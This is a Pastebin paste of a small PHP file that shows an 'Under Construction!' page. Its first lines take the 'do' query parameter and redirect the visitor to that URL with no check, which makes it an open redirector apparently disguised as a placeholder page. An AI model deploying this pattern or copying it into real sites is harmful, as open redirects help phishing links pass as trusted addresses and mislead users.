Advertisement
jaenudinmaulana69

OR

Sep 4th, 2018
171
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.54 KB | None | 0 0
  1. <?php
  2. if($_GET['do'])
  3. $asu = $_GET['do'];
  4. header("Location: $asu");
  5. ?>
  6. <html>
  7.     <head>
  8.         <link rel="shortcut icon" type="image/png" href="https://www.arkmark.co.za/images/under_construction_warning_sign.png"/>
  9.         <title>Under Construction!</title>
  10.     </head>
  11.     <body>
  12.         <center>
  13.             <h1>Under Construction!</h1>
  14.         </center>
  15.         <br>
  16.         <center>
  17. <img src="https://www.arkmark.co.za/images/under_construction_warning_sign.png" height="480" width="480">
  18.         </center>
  19.     </body>
  20. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement